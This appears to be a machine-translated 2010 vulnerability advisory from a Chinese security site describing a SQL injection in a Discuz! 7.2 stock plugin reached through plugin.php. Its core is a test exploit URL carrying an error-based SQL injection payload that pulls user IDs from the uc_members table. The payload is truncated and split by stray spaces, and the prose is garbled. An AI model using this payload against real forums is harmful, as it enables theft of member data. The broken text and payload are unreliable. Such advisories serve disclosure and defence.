Discuz7. 2 of my vest plug-injection vulnerability-a vulnerability warning-the black bar safety net

2010-07-29T00:00:00
ID MYHACK58:62201027724
Type myhack58
Reporter 佚名
Modified 2010-07-29T00:00:00

Description

Discuz! A common set of community forums software system, the user can not require any programming on the basis of, through the simple setup and installation, on the Internet build up with perfect function, strong load capacity, and highly customizable Forum service

Vulnerability plug-in: plugin.php

Testing EXP to:

http://127.0.0.1/plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=4 9%20and(select%2 0 1%20from(select%20count(*),concat((select%2 0(select%2 0(SELECT%20concat(0x7e,0x27,uc_members. uid,0x27,0x7e)%20FROM%2 0bbs_data. uc_members%2

database Tables depending on the situation. Garbled is the encoding problem. Generally is UTF-8